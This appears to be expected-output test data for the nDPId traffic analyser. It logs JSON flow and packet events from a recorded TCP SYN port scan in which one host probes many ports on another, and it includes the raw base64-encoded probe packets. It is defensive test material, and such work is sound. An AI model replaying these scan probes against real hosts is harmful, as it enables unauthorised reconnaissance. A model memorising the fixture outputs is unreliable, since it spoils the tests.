-00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":874,"source":"synscan.pcap","alias":"nDPId-test","flow_id":865,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1864,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":874,"source":"synscan.pcap","alias":"nDPId-test","flow_id":865,"flow_packet_id":1,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059846,"pkt":"ACYLMQczACWzv5HuCABFAAAsbxoAACUGtFisEAAIQA2GNIzSB0jdUoMYAAAAAGACCAApRwAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":875,"source":"synscan.pcap","alias":"nDPId-test","flow_id":866,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":901,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":875,"source":"synscan.pcap","alias":"nDPId-test","flow_id":866,"flow_packet_id":1,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059846,"pkt":"ACYLMQczACWzv5HuCABFAAAsjUUAACwGjy2sEAAIQA2GNIzSA4XdUoMYAAAAAGACBAAxCgAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":876,"source":"synscan.pcap","alias":"nDPId-test","flow_id":867,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":981,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":876,"source":"synscan.pcap","alias":"nDPId-test","flow_id":867,"flow_packet_id":1,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059846,"pkt":"ACYLMQczACWzv5HuCABFAAAsMeAAACgG7pKsEAAIQA2GNIzSA9XdUoMYAAAAAGACBAAwugAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":877,"source":"synscan.pcap","alias":"nDPId-test","flow_id":868,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5560,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":877,"source":"synscan.pcap","alias":"nDPId-test","flow_id":868,"flow_packet_id":1,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059846,"pkt":"ACYLMQczACWzv5HuCABFAAAsvrcAADgGUbusEAAIQA2GNIzSFbjdUoMYAAAAAGACBAAe1wAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":878,"source":"synscan.pcap","alias":"nDPId-test","flow_id":869,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3007,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":878,"source":"synscan.pcap","alias":"nDPId-test","flow_id":869,"flow_packet_id":1,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059846,"pkt":"ACYLMQczACWzv5HuCABFAAAszmQAAC4GTA6sEAAIQA2GNIzSC7\/dUoMYAAAAAGACDAAg0AAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":879,"source":"synscan.pcap","alias":"nDPId-test","flow_id":870,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1119,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00461{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":879,"source":"synscan.pcap","alias":"nDPId-test","flow_id":870,"flow_packet_id":1,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059846,"pkt":"ACYLMQczACWzv5HuCABFAAAswF0AACkGXxWsEAAIQA2GNIzSBF\/dUoMYAAAAAGACCAAsMAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":880,"source":"synscan.pcap","alias":"nDPId-test","flow_id":871,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":55555,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":880,"source":"synscan.pcap","alias":"nDPId-test","flow_id":871,"flow_packet_id":1,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059846,"pkt":"ACYLMQczACWzv5HuCABFAAAsVtQAADQGvZ6sEAAIQA2GNIzS2QPdUoMYAAAAAGACBABbiwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":881,"source":"synscan.pcap","alias":"nDPId-test","flow_id":872,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3766,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":881,"source":"synscan.pcap","alias":"nDPId-test","flow_id":872,"flow_packet_id":1,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059846,"pkt":"ACYLMQczACWzv5HuCABFAAAsEBMAADUGA2CsEAAIQA2GNIzSDrbdUoMYAAAAAGACCAAh2QAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":882,"source":"synscan.pcap","alias":"nDPId-test","flow_id":873,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1600,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":882,"source":"synscan.pcap","alias":"nDPId-test","flow_id":873,"flow_packet_id":1,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059846,"pkt":"ACYLMQczACWzv5HuCABFAAAsXHsAADYGtfesEAAIQA2GNIzSBkDdUoMYAAAAAGACDAAmTwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":883,"source":"synscan.pcap","alias":"nDPId-test","flow_id":874,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1192,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":883,"source":"synscan.pcap","alias":"nDPId-test","flow_id":874,"flow_packet_id":1,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059846,"pkt":"ACYLMQczACWzv5HuCABFAAAs5n4AACgGOfSsEAAIQA2GNIzSBKjdUoMYAAAAAGACBAAv5wAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":884,"source":"synscan.pcap","alias":"nDPId-test","flow_id":875,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059846,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059846,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":12174,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":884,"source":"synscan.pcap","alias":"nDPId-test","flow_id":875,"flow_packet_id":1,"flow_last_seen":1278275059846,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059846,"pkt":"ACYLMQczACWzv5HuCABFAAAs2vsAADIGO3esEAAIQA2GNIzSL47dUoMYAAAAAGACDAD9AAAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":885,"source":"synscan.pcap","alias":"nDPId-test","flow_id":876,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059847,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":11110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":885,"source":"synscan.pcap","alias":"nDPId-test","flow_id":876,"flow_packet_id":1,"flow_last_seen":1278275059847,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059847,"pkt":"ACYLMQczACWzv5HuCABFAAAschMAACoGrF+sEAAIQA2GNIzSK2bdUoMYAAAAAGACDAABKQAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":886,"source":"synscan.pcap","alias":"nDPId-test","flow_id":877,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059847,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":15002,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":886,"source":"synscan.pcap","alias":"nDPId-test","flow_id":877,"flow_packet_id":1,"flow_last_seen":1278275059847,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059847,"pkt":"ACYLMQczACWzv5HuCABFAAAsnCkAADcGdUmsEAAIQA2GNIzSOprdUoMYAAAAAGACEADt9AAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":887,"source":"synscan.pcap","alias":"nDPId-test","flow_id":878,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059847,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":12345,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":887,"source":"synscan.pcap","alias":"nDPId-test","flow_id":878,"flow_packet_id":1,"flow_last_seen":1278275059847,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059847,"pkt":"ACYLMQczACWzv5HuCABFAAAspFoAADUGbxisEAAIQA2GNIzSMDndUoMYAAAAAGACCAAAVgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":888,"source":"synscan.pcap","alias":"nDPId-test","flow_id":879,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059847,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9968,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":888,"source":"synscan.pcap","alias":"nDPId-test","flow_id":879,"flow_packet_id":1,"flow_last_seen":1278275059847,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059847,"pkt":"ACYLMQczACWzv5HuCABFAAAsF4AAADsG9fKsEAAIQA2GNIzSJvDdUoMYAAAAAGACEAABnwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":889,"source":"synscan.pcap","alias":"nDPId-test","flow_id":880,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059847,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1974,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":889,"source":"synscan.pcap","alias":"nDPId-test","flow_id":880,"flow_packet_id":1,"flow_last_seen":1278275059847,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059847,"pkt":"ACYLMQczACWzv5HuCABFAAAsslAAADkGXSKsEAAIQA2GNIzSB7bdUoMYAAAAAGACCAAo2QAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":890,"source":"synscan.pcap","alias":"nDPId-test","flow_id":881,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059847,"flow_last_seen":1278275059847,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059847,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":890,"source":"synscan.pcap","alias":"nDPId-test","flow_id":881,"flow_packet_id":1,"flow_last_seen":1278275059847,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059847,"pkt":"ACYLMQczACWzv5HuCABFAAAsyZQAACwGUt6sEAAIQA2GNIzSJqzdUoMYAAAAAGACBAAN4wAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":891,"source":"synscan.pcap","alias":"nDPId-test","flow_id":882,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059851,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1164,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":891,"source":"synscan.pcap","alias":"nDPId-test","flow_id":882,"flow_packet_id":1,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059851,"pkt":"ACYLMQczACWzv5HuCABFAAAsUYgAADkGveqsEAAIQA2GNIzSBIzdUoMYAAAAAGACCAAsAwAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":892,"source":"synscan.pcap","alias":"nDPId-test","flow_id":883,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059851,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":898,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":892,"source":"synscan.pcap","alias":"nDPId-test","flow_id":883,"flow_packet_id":1,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059851,"pkt":"ACYLMQczACWzv5HuCABFAAAsDTcAAC8GDDysEAAIQA2GNIzSA4LdUoMYAAAAAGACEAAlDQAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":893,"source":"synscan.pcap","alias":"nDPId-test","flow_id":884,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059851,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6881,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":893,"source":"synscan.pcap","alias":"nDPId-test","flow_id":884,"flow_packet_id":1,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059851,"pkt":"ACYLMQczACWzv5HuCABFAAAsiQgAACkGlmqsEAAIQA2GNIzSGuHdUoMYAAAAAGACCAAVrgAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":894,"source":"synscan.pcap","alias":"nDPId-test","flow_id":885,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059851,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":34571,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":894,"source":"synscan.pcap","alias":"nDPId-test","flow_id":885,"flow_packet_id":1,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059851,"pkt":"ACYLMQczACWzv5HuCABFAAAsouUAADgGbY2sEAAIQA2GNIzShwvdUoMYAAAAAGACBACtgwAAAgQFtA=="} -00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":895,"source":"synscan.pcap","alias":"nDPId-test","flow_id":886,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059851,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":500,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":895,"source":"synscan.pcap","alias":"nDPId-test","flow_id":886,"flow_packet_id":1,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059851,"pkt":"ACYLMQczACWzv5HuCABFAAAs0KgAACYGUcqsEAAIQA2GNIzSAfTdUoMYAAAAAGACDAAqmwAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":896,"source":"synscan.pcap","alias":"nDPId-test","flow_id":887,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059851,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5120,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":896,"source":"synscan.pcap","alias":"nDPId-test","flow_id":887,"flow_packet_id":1,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059851,"pkt":"ACYLMQczACWzv5HuCABFAAAsyxIAADkGRGCsEAAIQA2GNIzSFADdUoMYAAAAAGACCAAcjwAAAgQFtA=="} -00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":897,"source":"synscan.pcap","alias":"nDPId-test","flow_id":888,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059851,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":18040,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":897,"source":"synscan.pcap","alias":"nDPId-test","flow_id":888,"flow_packet_id":1,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059851,"pkt":"ACYLMQczACWzv5HuCABFAAAslCcAADIGgkusEAAIQA2GNIzSRnjdUoMYAAAAAGACDADmFgAAAgQFtA=="} -00577{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":898,"source":"synscan.pcap","alias":"nDPId-test","flow_id":889,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275059851,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275059851,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5060,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":898,"source":"synscan.pcap","alias":"nDPId-test","flow_id":889,"flow_packet_id":1,"flow_last_seen":1278275059851,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275059851,"pkt":"ACYLMQczACWzv5HuCABFAAAs1vIAADkGOICsEAAIQA2GNIzSE8TdUoMYAAAAAGACCAAcywAAAgQFtA=="} 